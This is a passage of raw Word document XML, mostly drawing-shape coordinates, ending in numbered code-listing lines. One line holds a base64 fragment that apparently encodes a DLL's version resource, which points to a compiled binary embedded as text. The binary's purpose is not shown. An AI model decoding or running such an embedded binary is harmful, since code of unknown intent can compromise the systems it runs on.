0777,2908,10777,2907,10777,2906,10777,2905,10777,2904,10777,2902,10777,2901,10777,2900,10777,2899,10777,2898,10777,2896,10777,2895,10777,2894,10777,2892,10777,2891,10777,2890,10777,2888,10777,2887,10777,2885,10777,2884,10777,2882,10777,2881,10777,2879,10777,2877,10777,2875,10777,2874,10777,2872,10777,2870,10777,2868,10777,2866,10777,2864,10777,2862,10777,2860,10777,2858,10777,2856,10777,2854,10777,2852,10777,2850,10777,2847,10777,2845,10777,2843,10777,2840,10777,2838,10777,2836,10777,2833,10777,2830,10777,2828,10777,2828,10777,2828,10777,2828,10777,2828,10777,2828,10777,2828,10777,2828,10777,2828,10777,2828,10777,2828,10777,2828,10777,2828,10777,2828,10777,2828,10777,2828,10777,2828,10776,2828,10776,2828,10776,2828,10776,2828,10776,2828,10776,2828,10776,2828,10775,2828,10775,2828,10775,2828,10775,2828,10775,2828,10774,2828,10774,2828,10774,2828,10773,2828,10773,2828,10773,2828,10772,2828,10772,2828,10771,2828,10771,2828,10770,2828,10770,2828,10769,2828,10768,2828,10768,2828,10767,2828,10766,2828,10766,2828,10765,2828,10764,2828,10763,2828,10762,2828,10761,2828,10761,2828,10760,2828,10758,2828,10757,2828,10756,2828,10755,2828,10754,2828,10753,2828,10751,2828,10750,2828,10749,2828,10747,2828,10746,2828,10744,2828,10743,2828,10741,2828,10739,2828,10738,2828,10736,2828,10734,2828,10732,2828,10730,2828,10728,2828,10726,2828,10724,2828,10722,2828,10719,2828,10717,2828,10715,2828,10712,2828,10710,2828,10707,2828,10705,2828,10702,2828,10699,2828,10697,2828,10694,2828,10691,2828,10688,2828,10685,2828,10682,2828,10678,2828,10675,2828,10672,2828,10668,2828,10665,2828,10661,2828,10657,2828,10654,2828,10650,2828,10646,2828,10642,2828,10638,2828,10634,2828,10630,2828,10625,2828,10621,2828,10617,2828,10612,2828,10607,2828,10603,2828,10598,2828,10593,2828,10588,2828,10583,2828,10578,2828,10573,2828,10567,2828,10562,2828,10556e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:135.500pt;margin-top:554.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2710,11090" coordsize="110,230">
        <v:shape style="position:absolute;left:2710;top:11090;width:110;height:230" coordorigin="2710,11090" coordsize="110,230" path="m2724,11101l2724,11101,2724,11101,2724,11101,2724,11101,2724,11101,2724,11101,2724,11101,2724,11101,2724,11101,2724,11101,2724,11101,2724,11101,2724,11101,2724,11101,2724,11101,2724,11101,2724,11101,2724,11101,2725,11101,2725,11101,2725,11101,2725,11101,2725,11101,2725,11101,2725,11101,2725,11101,2725,11101,2725,11101,2726,11101,2726,11101,2726,11101,2726,11101,2726,11101,2726,11101,2727,11101,2727,11101,2727,11101,2727,11101,2728,11101,2728,11101,2728,11101,2728,11101,2729,11101,2729,11101,2729,11101,2730,11101,2730,11101,2731,11101,2731,11101,2731,11101,2732,11101,2732,11101,2733,11101,2733,11101,2734,11101,2734,11101,2735,11101,2736,11101,2736,11101,2737,11101,2737,11101,2738,11101,2739,11101,2740,11101,2740,11101,2741,11101,2742,11101,2743,11101,2744,11101,2744,11101,2745,11101,2746,11101,2747,11101,2748,11101,2749,11101,2750,11101,2751,11101,2752,11101,2753,11101,2755,11101,2756,11101,2757,11101,2758,11101,2759,11101,2761,11101,2762,11101,2763,11101,2765,11101,2766,11101,2768,11101,2769,11101,2771,11101,2772,11101,2774,11101,2775,11101,2777,11101,2779,11101,2780,11101,2782,11101,2784,11101,2786,11101,2788,11101,2789,11101,2791,11101,2793,11101,2795,11101,2797,11101,2800,11101,2802,11101,2804,11101,2806,11101,2808,11101,2811,11101,2813,11101,2815,11101,2818,11101,2820,11101,2823,11101,2825,11101,2828,11101,2828,11101,2828,11101,2828,11101,2828,11101,2828,11101,2828,11101,2828,11101,2828,11101,2828,11101,2828,11101,2828,11101,2828,11101,2828,11101,2828,11101,2828,11101,2828,11101,2828,11102,2828,11102,2828,11102,2828,11102,2828,11102,2828,11102,2828,11102,2828,11103,2828,11103,2828,11103,2828,11103,2828,11104,2828,11104,2828,11104,2828,11105,2828,11105,2828,11105,2828,11106,2828,11106,2828,11107,2828,11107,2828,11108,2828,11108,2828,11109,2828,11109,2828,11110,2828,11111,2828,11111,2828,11112,2828,11113,2828,11114,2828,11115,2828,11116,2828,11116,2828,11117,2828,11118,2828,11119,2828,11121,2828,11122,2828,11123,2828,11124,2828,11125,2828,11127,2828,11128,2828,11129,2828,11131,2828,11132,2828,11134,2828,11135,2828,11137,2828,11139,2828,11140,2828,11142,2828,11144,2828,11146,2828,11148,2828,11150,2828,11152,2828,11154,2828,11156,2828,11158,2828,11161,2828,11163,2828,11166,2828,11168,2828,11171,2828,11173,2828,11176,2828,11179,2828,11181,2828,11184,2828,11187,2828,11190,2828,11193,2828,11196,2828,11200,2828,11203,2828,11206,2828,11210,2828,11213,2828,11217,2828,11220,2828,11224,2828,11228,2828,11232,2828,11236,2828,11240,2828,11244,2828,11248,2828,11252,2828,11257,2828,11261,2828,11266,2828,11270,2828,11275,2828,11280,2828,11285,2828,11290,2828,11295,2828,11300,2828,11305,2828,11311,2828,11316,2828,11321,2828,11321,2828,11321,2828,11321,2828,11321,2828,11321,2828,11321,2828,11321,2828,11321,2828,11321,2828,11321,2828,11321,2828,11321,2828,11321,2828,11321,2828,11321,2828,11321,2828,11321,2828,11321,2828,11321,2827,11321,2827,11321,2827,11321,2827,11321,2827,11321,2827,11321,2827,11321,2827,11321,2827,11321,2827,11321,2826,11321,2826,11321,2826,11321,2826,11321,2826,11321,2825,11321,2825,11321,2825,11321,2825,11321,2825,11321,2824,11321,2824,11321,2824,11321,2823,11321,2823,11321,2823,11321,2822,11321,2822,11321,2822,11321,2821,11321,2821,11321,2820,11321,2820,11321,2819,11321,2819,11321,2818,11321,2818,11321,2817,11321,2816,11321,2816,11321,2815,11321,2815,11321,2814,11321,2813,11321,2813,11321,2812,11321,2811,11321,2810,11321,2809,11321,2809,11321,2808,11321,2807,11321,2806,11321,2805,11321,2804,11321,2803,11321,2802,11321,2801,11321,2800,11321,2799,11321,2798,11321,2796,11321,2795,11321,2794,11321,2793,11321,2791,11321,2790,11321,2789,11321,2787,11321,2786,11321,2784,11321,2783,11321,2782,11321,2780,11321,2778,11321,2777,11321,2775,11321,2773,11321,2772,11321,2770,11321,2768,11321,2766,11321,2764,11321,2763,11321,2761,11321,2759,11321,2757,11321,2755,11321,2752,11321,2750,11321,2748,11321,2746,11321,2744,11321,2741,11321,2739,11321,2737,11321,2734,11321,2732,11321,2729,11321,2727,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11321,2724,11320,2724,11320,2724,11320,2724,11320,2724,11320,2724,11319,2724,11319,2724,11319,2724,11319,2724,11318,2724,11318,2724,11318,2724,11317,2724,11317,2724,11316,2724,11316,2724,11315,2724,11315,2724,11314,2724,11314,2724,11313,2724,11312,2724,11312,2724,11311,2724,11310,2724,11310,2724,11309,2724,11308,2724,11307,2724,11306,2724,11305,2724,11304,2724,11303,2724,11302,2724,11301,2724,11300,2724,11299,2724,11297,2724,11296,2724,11295,2724,11293,2724,11292,2724,11290,2724,11289,2724,11287,2724,11286,2724,11284,2724,11282,2724,11280,2724,11279,2724,11277,2724,11275,2724,11273,2724,11271,2724,11268,2724,11266,2724,11264,2724,11262,2724,11259,2724,11257,2724,11255,2724,11252,2724,11249,2724,11247,2724,11244,2724,11241,2724,11238,2724,11235,2724,11232,2724,11229,2724,11226,2724,11223,2724,11220,2724,11216,2724,11213,2724,11209,2724,11206,2724,11202,2724,11198,2724,11195,2724,11191,2724,11187,2724,11183,2724,11179,2724,11174,2724,11170,2724,11166,2724,11161,2724,11157,2724,11152,2724,11147,2724,11143,2724,11138,2724,11133,2724,11128,2724,11123,2724,11117,2724,11112,2724,11107,2724,11101e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:130.500pt;margin-top:600.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2610,12010" coordsize="110,230">
        <v:shape style="position:absolute;left:2610;top:12010;width:110;height:230" coordorigin="2610,12010" coordsize="110,230" path="m2620,12035l2620,12035,2620,12035,2620,12035,2620,12035,2620,12035,2620,12035,2620,12035,2620,12035,2620,12035,2620,12035,2620,12035,2620,12035,2621,12035,2621,12035,2621,12035,2621,12035,2621,12035,2621,12035,2621,12035,2621,12035,2621,12035,2621,12035,2621,12035,2621,12035,2621,12035,2621,12035,2621,12035,2622,12035,2622,12035,2622,12035,2622,12035,2622,12035,2622,12035,2623,12035,2623,12035,2623,12035,2623,12035,2624,12035,2624,12035,2624,12035,2624,12035,2625,12035,2625,12035,2625,12035,2626,12035,2626,12035,2626,12035,2627,12035,2627,12035,2628,12035,2628,12035,2629,12035,2629,12035,2630,12035,2630,12035,2631,12035,2631,12035,2632,12035,2632,12035,2633,12035,2634,12035,2634,12035,2635,12035,2636,12035,2637,12035,2637,12035,2638,12035,2639,12035,2640,12035,2641,12035,2642,12035,2642,12035,2643,12035,2644,12035,2645,12035,2646,12035,2647,12035,2649,12035,2650,12035,2651,12035,2652,12035,2653,12035,2654,12035,2656,12035,2657,12035,2658,12035,2660,12035,2661,12035,2662,12035,2664,12035,2665,12035,2667,12035,2668,12035,2670,12035,2672,12035,2673,12035,2675,12035,2677,12035,2678,12035,2680,12035,2682,12035,2684,12035,2686,12035,2688,12035,2690,12035,2692,12035,2694,12035,2696,12035,2698,12035,2700,12035,2702,12035,2705,12035,2707,12035,2709,12035,2712,12035,2714,12035,2717,12035,2719,12035,2722,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12035,2724,12036,2724,12036,2724,12036,2724,12036,2724,12036,2724,12037,2724,12037,2724,12037,2724,12037,2724,12038,2724,12038,2724,12038,2724,12039,2724,12039,2724,12039,2724,12040,2724,12040,2724,12041,2724,12041,2724,12042,2724,12042,2724,12043,2724,12044,2724,12044,2724,12045,2724,12046,2724,12047,2724,12047,2724,12048,2724,12049,2724,12050,2724,12051,2724,12052,2724,12053,2724,12054,2724,12055,2724,12056,2724,12058,2724,12059,2724,12060,2724,12062,2724,12063,2724,12064,2724,12066,2724,12067,2724,12069,2724,12071,2724,12072,2724,12074,2724,12076,2724,12078,2724,12080,2724,12082,2724,12084,2724,12086,2724,12088,2724,12090,2724,12092,2724,12094,2724,12097,2724,12099,2724,12102,2724,12104,2724,12107,2724,12109,2724,12112,2724,12115,2724,12118,2724,12121,2724,12124,2724,12127,2724,12130,2724,12133,2724,12137,2724,12140,2724,12143,2724,12147,2724,12150,2724,12154,2724,12158,2724,12162,2724,12166,2724,12169,2724,12174,2724,12178,2724,12182,2724,12186,2724,12190,2724,12195,2724,12199,2724,12204,2724,12209,2724,12214,2724,12218,2724,12223,2724,12229,2724,12234,2724,12239,2724,12244,2724,12250,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2724,12255,2723,12255,2723,12255,2723,12255,2723,12255,2723,12255,2723,12255,2723,12255,2722,12255,2722,12255,2722,12255,2722,12255,2722,12255,2722,12255,2721,12255,2721,12255,2721,12255,2721,12255,2720,12255,2720,12255,2720,12255,2719,12255,2719,12255,2719,12255,2718,12255,2718,12255,2717,12255,2717,12255,2716,12255,2716,12255,2716,12255,2715,12255,2714,12255,2714,12255,2713,12255,2713,12255,2712,12255,2712,12255,2711,12255,2710,12255,2709,12255,2709,12255,2708,12255,2707,12255,2706,12255,2706,12255,2705,12255,2704,12255,2703,12255,2702,12255,2701,12255,2700,12255,2699,12255,2698,12255,2697,12255,2696,12255,2695,12255,2694,12255,2693,12255,2691,12255,2690,12255,2689,12255,2688,12255,2686,12255,2685,12255,2684,12255,2682,12255,2681,12255,2679,12255,2678,12255,2676,12255,2675,12255,2673,12255,2671,12255,2670,12255,2668,12255,2666,12255,2664,12255,2663,12255,2661,12255,2659,12255,2657,12255,2655,12255,2653,12255,2651,12255,2649,12255,2647,12255,2644,12255,2642,12255,2640,12255,2638,12255,2635,12255,2633,12255,2631,12255,2628,12255,2626,12255,2623,12255,2620,12255,2620,12255,2620,12255,2620,12255,2620,12255,2620,12255,2620,12255,2620,12255,2620,12255,2620,12255,2620,12255,2620,12255,2620,12255,2620,12255,2620,12255,2620,12255,2620,12255,2620,12255,2620,12254,2620,12254,2620,12254,2620,12254,2620,12254,2620,12254,2620,12254,2620,12253,2620,12253,2620,12253,2620,12253,2620,12252,2620,12252,2620,12252,2620,12251,2620,12251,2620,12250,2620,12250,2620,12250,2620,12249,2620,12249,2620,12248,2620,12247,2620,12247,2620,12246,2620,12245,2620,12245,2620,12244,2620,12243,2620,12242,2620,12242,2620,12241,2620,12240,2620,12239,2620,12238,2620,12237,2620,12236,2620,12235,2620,12233,2620,12232,2620,12231,2620,12230,2620,12228,2620,12227,2620,12225,2620,12224,2620,12222,2620,12221,2620,12219,2620,12218,2620,12216,2620,12214,2620,12212,2620,12210,2620,12208,2620,12206,2620,12204,2620,12202,2620,12200,2620,12198,2620,12195,2620,12193,2620,12191,2620,12188,2620,12186,2620,12183,2620,12180,2620,12178,2620,12175,2620,12172,2620,12169,2620,12166,2620,12163,2620,12160,2620,12157,2620,12153,2620,12150,2620,12146,2620,12143,2620,12139,2620,12136,2620,12132,2620,12128,2620,12124,2620,12120,2620,12116,2620,12112,2620,12108,2620,12104,2620,12099,2620,12095,2620,12090,2620,12086,2620,12081,2620,12076,2620,12071,2620,12066,2620,12061,2620,12056,2620,12051,2620,12046,2620,12040,2620,12035e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:130.500pt;margin-top:616.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2610,12330" coordsize="110,230">
        <v:shape style="position:absolute;left:2610;top:12330;width:110;height:230" coordorigin="2610,12330" coordsize="110,230" path="m2620,12346l2620,12346,2620,12346,2620,12346,2620,12346,2620,12346,2620,12346,2620,12346,2620,12346,2620,12346,2620,12346,2620,12346,2620,12346,2621,12346,2621,12346,2621,12346,2621,12346,2621,12346,2621,12346,2621,12346,2621,12346,2621,12346,2621,12346,2621,12346,2621,12346,2621,12346,2621,12346,2621,12346,2622,12346,2622,12346,2622,12346,2622,12346,2622,12346,2622,12346,2623,12346,2623,12346,2623,12346,2623,12346,2624,12346,2624,12346,2624,12346,2624,12346,2625,12346,2625,12346,2625,12346,2626,12346,2626,12346,2626,12346,2627,12346,2627,12346,2628,12346,2628,12346,2629,12346,2629,12346,2630,12346,2630,12346,2631,12346,2631,12346,2632,12346,2632,12346,2633,12346,2634,12346,2634,12346,2635,12346,2636,12346,2637,12346,2637,12346,2638,12346,2639,12346,2640,12346,2641,12346,2642,12346,2642,12346,2643,12346,2644,12346,2645,12346,2646,12346,2647,12346,2649,12346,2650,12346,2651,12346,2652,12346,2653,12346,2654,12346,2656,12346,2657,12346,2658,12346,2660,12346,2661,12346,2662,12346,2664,12346,2665,12346,2667,12346,2668,12346,2670,12346,2672,12346,2673,12346,2675,12346,2677,12346,2678,12346,2680,12346,2682,12346,2684,12346,2686,12346,2688,12346,2690,12346,2692,12346,2694,12346,2696,12346,2698,12346,2700,12346,2702,12346,2705,12346,2707,12346,2709,12346,2712,12346,2714,12346,2717,12346,2719,12346,2722,12346,2724,12346,2724,12346,2724,12346,2724,12346,2724,12346,2724,12346,2724,12346,2724,12346,2724,12346,2724,12346,2724,12346,2724,12346,2724,12346,2724,12346,2724,12346,2724,12346,2724,12346,2724,12346,2724,12347,2724,12347,2724,12347,2724,12347,2724,12347,2724,12347,2724,12348,2724,12348,2724,12348,2724,12348,2724,12348,2724,12349,2724,12349,2724,12349,2724,12350,2724,12350,2724,12351,2724,12351,2724,12352,2724,12352,2724,12353,2724,12353,2724,12354,2724,12354,2724,12355,2724,12356,2724,12356,2724,12357,2724,12358,2724,12359,2724,12359,2724,12360,2724,12361,2724,12362,2724,12363,2724,12364,2724,12365,2724,12367,2724,12368,2724,12369,2724,12370,2724,12371,2724,12373,2724,12374,2724,12376,2724,12377,2724,12379,2724,12380,2724,12382,2724,12384,2724,12385,2724,12387,2724,12389,2724,12391,2724,12393,2724,12395,2724,12397,2724,12399,2724,12401,2724,12403,2724,12406,2724,12408,2724,12410,2724,12413,2724,12415,2724,12418,2724,12421,2724,12423,2724,12426,2724,12429,2724,12432,2724,12435,2724,12438,2724,12441,2724,12444,2724,12448,2724,12451,2724,12455,2724,12458,2724,12462,2724,12465,2724,12469,2724,12473,2724,12477,2724,12481,2724,12485,2724,12489,2724,12493,2724,12497,2724,12502,2724,12506,2724,12511,2724,12515,2724,12520,2724,12525,2724,12530,2724,12535,2724,12540,2724,12545,2724,12550,2724,12555,2724,12561,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2724,12566,2723,12566,2723,12566,2723,12566,2723,12566,2723,12566,2723,12566,2723,12566,2722,12566,2722,12566,2722,12566,2722,12566,2722,12566,2722,12566,2721,12566,2721,12566,2721,12566,2721,12566,2720,12566,2720,12566,2720,12566,2719,12566,2719,12566,2719,12566,2718,12566,2718,12566,2717,12566,2717,12566,2716,12566,2716,12566,2716,12566,2715,12566,2714,12566,2714,12566,2713,12566,2713,12566,2712,12566,2712,12566,2711,12566,2710,12566,2709,12566,2709,12566,2708,12566,2707,12566,2706,12566,2706,12566,2705,12566,2704,12566,2703,12566,2702,12566,2701,12566,2700,12566,2699,12566,2698,12566,2697,12566,2696,12566,2695,12566,2694,12566,2693,12566,2691,12566,2690,12566,2689,12566,2688,12566,2686,12566,2685,12566,2684,12566,2682,12566,2681,12566,2679,12566,2678,12566,2676,12566,2675,12566,2673,12566,2671,12566,2670,12566,2668,12566,2666,12566,2664,12566,2663,12566,2661,12566,2659,12566,2657,12566,2655,12566,2653,12566,2651,12566,2649,12566,2647,12566,2644,12566,2642,12566,2640,12566,2638,12566,2635,12566,2633,12566,2631,12566,2628,12566,2626,12566,2623,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12566,2620,12565,2620,12565,2620,12565,2620,12565,2620,12565,2620,12565,2620,12564,2620,12564,2620,12564,2620,12563,2620,12563,2620,12563,2620,12562,2620,12562,2620,12562,2620,12561,2620,12561,2620,12560,2620,12560,2620,12559,2620,12559,2620,12558,2620,12557,2620,12557,2620,12556,2620,12555,2620,12554,2620,12554,2620,12553,2620,12552,2620,12551,2620,12550,2620,12549,2620,12548,2620,12547,2620,12546,2620,12545,2620,12543,2620,12542,2620,12541,2620,12539,2620,12538,2620,12537,2620,12535,2620,12534,2620,12532,2620,12530,2620,12529,2620,12527,2620,12525,2620,12523,2620,12521,2620,12520,2620,12518,2620,12515,2620,12513,2620,12511,2620,12509,2620,12507,2620,12504,2620,12502,2620,12499,2620,12497,2620,12494,2620,12492,2620,12489,2620,12486,2620,12483,2620,12480,2620,12477,2620,12474,2620,12471,2620,12468,2620,12464,2620,12461,2620,12458,2620,12454,2620,12451,2620,12447,2620,12443,2620,12439,2620,12436,2620,12432,2620,12428,2620,12423,2620,12419,2620,12415,2620,12411,2620,12406,2620,12402,2620,12397,2620,12392,2620,12387,2620,12383,2620,12378,2620,12373,2620,12367,2620,12362,2620,12357,2620,12351,2620,12346e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:171.500pt;margin-top:726.500pt;width:10.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3430,14530" coordsize="210,230">
        <v:shape style="position:absolute;left:3430;top:14530;width:210;height:230" coordorigin="3430,14530" coordsize="210,230" path="m3450,14550l3450,14550,3450,14550,3450,14550,3450,14550,3450,14550,3450,14550,3450,14550,3450,14550,3450,14550,3450,14550,3450,14550,3450,14550,3451,14550,3451,14550,3451,14550,3451,14550,3451,14550,3451,14550,3451,14550,3451,14550,3451,14550,3451,14550,3452,14550,3452,14550,3452,14550,3452,14550,3452,14550,3453,14550,3453,14550,3453,14550,3454,14550,3454,14550,3454,14550,3455,14550,3455,14550,3456,14550,3456,14550,3457,14550,3457,14550,3458,14550,3458,14550,3459,14550,3459,14550,3460,14550,3461,14550,3462,14550,3462,14550,3463,14550,3464,14550,3465,14550,3466,14550,3467,14550,3468,14550,3469,14550,3470,14550,3471,14550,3472,14550,3473,14550,3474,14550,3476,14550,3477,14550,3478,14550,3480,14550,3481,14550,3483,14550,3484,14550,3486,14550,3487,14550,3489,14550,3491,14550,3493,14550,3494,14550,3496,14550,3498,14550,3500,14550,3502,14550,3504,14550,3507,14550,3509,14550,3511,14550,3513,14550,3516,14550,3518,14550,3521,14550,3523,14550,3526,14550,3529,14550,3531,14550,3534,14550,3537,14550,3540,14550,3543,14550,3546,14550,3549,14550,3553,14550,3556,14550,3559,14550,3563,14550,3566,14550,3570,14550,3573,14550,3577,14550,3581,14550,3585,14550,3589,14550,3593,14550,3597,14550,3601,14550,3605,14550,3610,14550,3614,14550,3619,14550,3623,14550,3628,14550,3633,14550,3638,14550,3643,14550,3648,14550,3653,14550,3658,14550,3658,14550,3658,14550,3658,14550,3658,14550,3658,14550,3658,14550,3658,14550,3658,14550,3658,14550,3658,14550,3658,14550,3658,14551,3658,14551,3658,14551,3658,14551,3658,14551,3658,14551,3658,14551,3658,14551,3658,14551,3658,14551,3658,14552,3658,14552,3658,14552,3658,14552,3658,14552,3658,14553,3658,14553,3658,14553,3658,14554,3658,14554,3658,14554,3658,14555,3658,14555,3658,14555,3658,14556,3658,14556,3658,14557,3658,14558,3658,14558,3658,14559,3658,14559,3658,14560,3658,14561,3658,14562,3658,14562,3658,14563,3658,14564,3658,14565,3658,14566,3658,14567,3658,14568,3658,14569,3658,14570,3658,14571,3658,14572,3658,14573,3658,14575,3658,14576,3658,14577,3658,14579,3658,14580,3658,14582,3658,14583,3658,14585,3658,14586,3658,14588,3658,14590,3658,14591,3658,14593,3658,14595,3658,14597,3658,14599,3658,14601,3658,14603,3658,14606,3658,14608,3658,14610,3658,14612,3658,14615,3658,14617,3658,14620,3658,14622,3658,14625,3658,14628,3658,14631,3658,14634,3658,14636,3658,14640,3658,14643,3658,14646,3658,14649,3658,14652,3658,14656,3658,14659,3658,14663,3658,14666,3658,14670,3658,14673,3658,14677,3658,14681,3658,14685,3658,14689,3658,14693,3658,14698,3658,14702,3658,14706,3658,14711,3658,14715,3658,14720,3658,14724,3658,14729,3658,14734,3658,14739,3658,14744,3658,14749,3658,14755,3658,14760,3658,14765,3658,14771,3658,14771,3658,14771,3658,14771,3658,14771,3658,14771,3658,14771,3658,14771,3658,14771,3658,14771,3658,14771,3658,14771,3658,14771,3658,14771,3658,14771,3657,14771,3657,14771,3657,14771,3657,14771,3657,14771,3657,14771,3657,14771,3657,14771,3656,14771,3656,14771,3656,14771,3656,14771,3656,14771,3655,14771,3655,14771,3655,14771,3654,14771,3654,14771,3654,14771,3653,14771,3653,14771,3653,14771,3652,14771,3652,14771,3651,14771,3650,14771,3650,14771,3649,14771,3649,14771,3648,14771,3647,14771,3647,14771,3646,14771,3645,14771,3644,14771,3643,14771,3642,14771,3641,14771,3640,14771,3639,14771,3638,14771,3637,14771,3636,14771,3635,14771,3634,14771,3633,14771,3631,14771,3630,14771,3628,14771,3627,14771,3626,14771,3624,14771,3622,14771,3621,14771,3619,14771,3617,14771,3616,14771,3614,14771,3612,14771,3610,14771,3608,14771,3606,14771,3604,14771,3602,14771,3599,14771,3597,14771,3595,14771,3592,14771,3590,14771,3587,14771,3585,14771,3582,14771,3579,14771,3577,14771,3574,14771,3571,14771,3568,14771,3565,14771,3562,14771,3559,14771,3556,14771,3552,14771,3549,14771,3545,14771,3542,14771,3538,14771,3535,14771,3531,14771,3527,14771,3523,14771,3519,14771,3515,14771,3511,14771,3507,14771,3503,14771,3498,14771,3494,14771,3489,14771,3485,14771,3480,14771,3475,14771,3471,14771,3466,14771,3461,14771,3456,14771,3450,14771,3450,14771,3450,14771,3450,14771,3450,14771,3450,14771,3450,14771,3450,14771,3450,14771,3450,14771,3450,14771,3450,14771,3450,14771,3450,14771,3450,14771,3450,14770,3450,14770,3450,14770,3450,14770,3450,14770,3450,14770,3450,14770,3450,14770,3450,14769,3450,14769,3450,14769,3450,14769,3450,14769,3450,14768,3450,14768,3450,14768,3450,14767,3450,14767,3450,14767,3450,14766,3450,14766,3450,14765,3450,14765,3450,14764,3450,14764,3450,14763,3450,14762,3450,14762,3450,14761,3450,14760,3450,14760,3450,14759,3450,14758,3450,14757,3450,14756,3450,14755,3450,14754,3450,14753,3450,14752,3450,14751,3450,14750,3450,14749,3450,14748,3450,14747,3450,14745,3450,14744,3450,14743,3450,14741,3450,14740,3450,14738,3450,14737,3450,14735,3450,14733,3450,14731,3450,14730,3450,14728,3450,14726,3450,14724,3450,14722,3450,14720,3450,14718,3450,14716,3450,14713,3450,14711,3450,14709,3450,14706,3450,14704,3450,14701,3450,14699,3450,14696,3450,14693,3450,14690,3450,14688,3450,14685,3450,14682,3450,14679,3450,14675,3450,14672,3450,14669,3450,14666,3450,14662,3450,14659,3450,14655,3450,14651,3450,14648,3450,14644,3450,14640,3450,14636,3450,14632,3450,14628,3450,14624,3450,14619,3450,14615,3450,14611,3450,14606,3450,14601,3450,14597,3450,14592,3450,14587,3450,14582,3450,14577,3450,14572,3450,14567,3450,14561,3450,14556,3450,14550e x" fillcolor="#fefefe" stroke="f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68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65" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>177</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDA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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>178</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
